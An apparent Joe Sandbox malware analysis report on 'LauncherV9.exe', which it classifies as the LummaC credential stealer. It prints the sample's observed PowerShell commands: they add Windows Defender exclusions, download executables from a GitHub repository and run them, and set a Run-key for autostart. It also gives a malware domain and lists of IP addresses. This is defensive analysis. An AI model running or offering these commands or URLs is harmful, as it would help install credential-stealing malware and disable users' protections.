Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
LauncherV9.exe

Overview

General Information

Sample name:LauncherV9.exe
Analysis ID:1639444
MD5:7cebc9159f619bc1d7fe80abb796da26
SHA1:744b8bacd5ab94de1a20730caf055ca46e2ebbba
SHA256:8e74a11159a720f1bc4fd09057c2191b28b6935df09d502298d698a65df22a18
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected LummaC Stealer
Adds a directory exclusion to Windows Defender
Contains functionality to determine the online IP of the system
Found API chain indicative of debugger detection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PE file has nameless sections
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Invoke-WebRequest Execution
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Tries to resolve many domain names, but no domain seems valid
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • LauncherV9.exe (PID: 8004 cmdline: "C:\Users\user\Desktop\LauncherV9.exe" MD5: 7CEBC9159F619BC1D7FE80ABB796DA26)
    • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7996 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • WmiPrvSE.exe (PID: 8028 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • cmd.exe (PID: 7268 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 4476 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • jaclo.exe (PID: 6128 cmdline: "C:\zjxbeopkqt\jaclo.exe" MD5: 64FAB8A4DDC5B5EC7497FB6C72017CAE)
    • cmd.exe (PID: 1224 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 7976 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • dll.exe (PID: 8252 cmdline: "C:\Users\user\AppData\Local\dll.exe" MD5: 7D2EDC5B91D2913419A25D277E31DCD0)
    • cmd.exe (PID: 8260 cmdline: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 8284 cmdline: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/Service.exe' -OutFile 'C:\Users\user\AppData\Local\Service.exe'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • Service.exe (PID: 8752 cmdline: "C:\Users\user\AppData\Local\Service.exe" MD5: C6063E70D5165D1186696D84A18576B2)
  • Service.exe (PID: 8908 cmdline: "C:\Users\user\AppData\Local\Service.exe" MD5: C6063E70D5165D1186696D84A18576B2)
  • Service.exe (PID: 9016 cmdline: "C:\Users\user\AppData\Local\Service.exe" MD5: C6063E70D5165D1186696D84A18576B2)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000010.00000003.1495951794.000000000124F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000010.00000003.1472449424.000000000124F000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: dll.exe PID: 8252JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: dll.exe PID: 8252JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          13.2.jaclo.exe.ba0000.0.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security

            System Summary

            barindex
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", ProcessId: 7268, ProcessName: cmd.exe
            Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", ProcessId: 7268, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", ProcessId: 7320, ProcessName: cmd.exe
            Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", CommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 1224, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/opyksdkawddd.exe' -OutFile 'C:\Users\user\AppData\Local\dll.exe'", ProcessId: 7976, ProcessName: powershell.exe
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Service.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\LauncherV9.exe, ProcessId: 8004, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\FileAutostart
            Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4476, TargetFilename: C:\zjxbeopkqt\jaclo.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", ProcessId: 7268, ProcessName: cmd.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", ProcessId: 7320, ProcessName: cmd.exe
            Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\LauncherV9.exe", ParentImage: C:\Users\user\Desktop\LauncherV9.exe, ParentProcessId: 8004, ParentProcessName: LauncherV9.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/deripascod/coderoom/raw/refs/heads/main/mtohpasekfaddd.exe' -OutFile 'C:\zjxbeopkqt\jaclo.exe'", ProcessId: 7268, ProcessName: cmd.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7320, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\zjxbeopkqt', 'C:\Users', 'C:\ProgramData'", ProcessId: 7996, ProcessName: powershell.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-15T16:39:12.818021+010020283713Unknown Traffic192.168.2.55783323.197.127.21443TCP
            2025-03-15T16:39:14.032651+010020283713Unknown Traffic192.168.2.55783523.197.127.21443TCP
            2025-03-15T16:39:16.665979+010020283713Unknown Traffic192.168.2.55783723.197.127.21443TCP
            2025-03-15T16:39:17.860354+010020283713Unknown Traffic192.168.2.55783923.197.127.21443TCP
            2025-03-15T16:39:18.960687+010020283713Unknown Traffic192.168.2.557842104.21.96.1443TCP
            2025-03-15T16:39:20.527226+010020283713Unknown Traffic192.168.2.55784823.197.127.21443TCP
            2025-03-15T16:39:21.575616+010020283713Unknown Traffic192.168.2.557849104.21.96.1443TCP
            2025-03-15T16:39:22.893821+010020283713Unknown Traffic192.168.2.55785223.197.127.21443TCP
            2025-03-15T16:39:23.977381+010020283713Unknown Traffic192.168.2.557854104.21.96.1443TCP
            2025-03-15T16:39:25.293974+010020283713Unknown Traffic192.168.2.55785523.197.127.21443TCP
            2025-03-15T16:39:26.619438+010020283713Unknown Traffic192.168.2.557856104.21.96.1443TCP
            2025-03-15T16:39:28.312191+010020283713Unknown Traffic192.168.2.55785723.197.127.21443TCP
            2025-03-15T16:39:29.746152+010020283713Unknown Traffic192.168.2.557858104.21.96.1443TCP
            2025-03-15T16:39:31.354729+010020283713Unknown Traffic192.168.2.55786123.197.127.21443TCP
            2025-03-15T16:39:32.963741+010020283713Unknown Traffic192.168.2.557862104.73.234.102443TCP
            2025-03-15T16:39:34.189424+010020283713Unknown Traffic192.168.2.557863104.73.234.102443TCP
            2025-03-15T16:39:35.365509+010020283713Unknown Traffic192.168.2.557864104.73.234.102443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-15T16:39:10.211762+010018100032Potentially Bad Traffic185.199.110.133443192.168.2.557832TCP
            2025-03-15T16:39:14.056587+010018100032Potentially Bad Traffic185.199.110.133443192.168.2.557836TCP
            2025-03-15T16:39:18.242010+010018100032Potentially Bad Traffic185.199.110.133443192.168.2.557841TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-15T16:39:09.532262+010018100002Potentially Bad Traffic192.168.2.557831140.82.121.4443TCP
            2025-03-15T16:39:10.211709+010018100002Potentially Bad Traffic192.168.2.557832185.199.110.133443TCP
            2025-03-15T16:39:13.470342+010018100002Potentially Bad Traffic192.168.2.557834140.82.121.4443TCP
            2025-03-15T16:39:14.056397+010018100002Potentially Bad Traffic192.168.2.557836185.199.110.133443TCP
            2025-03-15T16:39:17.634735+010018100002Potentially Bad Traffic192.168.2.557838140.82.121.4443TCP
            2025-03-15T16:39:18.241928+010018100002Potentially Bad Traffic192.168.2.557841185.199.110.133443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: https://bugildbett.top/Avira URL Cloud: Label: malware
            Source: C:\Users\user\AppData\Local\dll.exeAvira: detection malicious, Label: HEUR/AGEN.1314134
            Source: C:\zjxbeopkqt\jaclo.exeAvira: detection malicious, Label: HEUR/AGEN.1314134
            Source: C:\Users\user\AppData\Local\Service.exeReversingLabs: Detection: 69%
            Source: C:\Users\user\AppData\Local\dll.exeReversingLabs: Detection: 83%
            Source: C:\zjxbeopkqt\jaclo.exeReversingLabs: Detection: 87%
            Source: LauncherV9.exeVirustotal: Detection: 49%Perma Link
            Source: LauncherV9.exeReversingLabs: Detection: 38%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038C833 CryptUnprotectData,CryptUnprotectData,16_2_0038C833
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038BCC0 CryptUnprotectData,16_2_0038BCC0
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 16_2_0038C833 CryptUnprotectData,CryptUnprotectData,16_2_0038C833
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57831 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57832 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57833 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57834 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57836 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57835 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57837 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.5:57838 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57839 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.5:57841 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57842 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57848 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57849 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57852 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57854 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57855 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57856 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57857 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.96.1:443 -> 192.168.2.5:57858 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 23.197.127.21:443 -> 192.168.2.5:57861 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57862 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57863 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.73.234.102:443 -> 192.168.2.5:57864 version: TLS 1.2
            Source: LauncherV9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb source: LauncherV9.exe
            Source: Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb) source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr
            Source: Binary string: C:\Users\danar\source\repos\opretorsa\x64\Release\opretorsa.pdb5 source: LauncherV9.exe
            Source: Binary string: \LoaderV2\ClientLoader\x64\Release\ClientLoader.pdb source: Service.exe, 00000016.00000000.1448891266.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000016.00000002.2513871933.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000002.2514078323.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000017.00000000.1545689250.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000002.2513823440.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe, 00000018.00000000.1629513187.00007FF621C1F000.00000002.00000001.01000000.00000007.sdmp, Service.exe.18.dr
            Source: C:\Users\user\Desktop\LauncherV9.exeCode function: 0_2_00007FF74632A334 FindFirstFileExW,0_2_00007FF74632A334
            Source: C:\Users\user\AppData\Local\Service.exeCode function: 22_2_00007FF621C13160 FindFirstFileExW,22_2_00007FF621C13160
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx esi, byte ptr [eax+edx-16h]13_2_00BAEC28
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+175AE18Ah]13_2_00BEC050
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx eax, byte ptr [ecx+esi]13_2_00BAE99F
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then mov dword ptr [esp], edx13_2_00BABAA0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+06F294E8h]13_2_00BAC0B0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+1D6A478Ch]13_2_00BE1CD0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ebp, word ptr [ecx]13_2_00BEB010
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]13_2_00BD2870
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then cmp word ptr [edi+ecx+02h], 0000h13_2_00BAE865
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movsx ecx, byte ptr [eax+edx]13_2_00BEA190
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-485B3D16h]13_2_00BB15FF
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-485B3D1Eh]13_2_00BCE9E0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx]13_2_00BCE9E0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then call 00BAFD90h13_2_00BAF1D7
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+00000172h]13_2_00BADD67
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then and edi, 80000000h13_2_00BABEA0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ecx, byte ptr [esi+eax-485B3D16h]13_2_00BB1AE5
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]13_2_00BAA2D0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]13_2_00BAA2D0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax+00h]13_2_00BACED0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then cmp word ptr [edi+ebx], 0000h13_2_00BEAAD0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then mov dword ptr [esi], ecx13_2_00BB2E2C
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movsx ecx, byte ptr [eax+edx]13_2_00BEA220
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then mov edx, dword ptr [ecx+esi+3Ch]13_2_00BE6250
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then mov dword ptr [esi+04h], ecx13_2_00BB1E4E
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx edx, byte ptr [esp+esi]13_2_00BD1BB0
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+02h]13_2_00BAC380
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-0704EA1Eh]13_2_00BCEF70
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+1Dh]13_2_00BCEF70
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+30h]13_2_00BCEF50
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+48h]13_2_00BE2750
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+60h]13_2_00BE2750
            Source: C:\zjxbeopkqt\jaclo.exeCode function: 4x nop then push edi13_2_00BB1346
            Source: C:\Users\user\AppData\Local\dll.exeCode function: 4x nop then movzx ebx, byte ptr [esp+eax+00000104h]16_2_0038C833
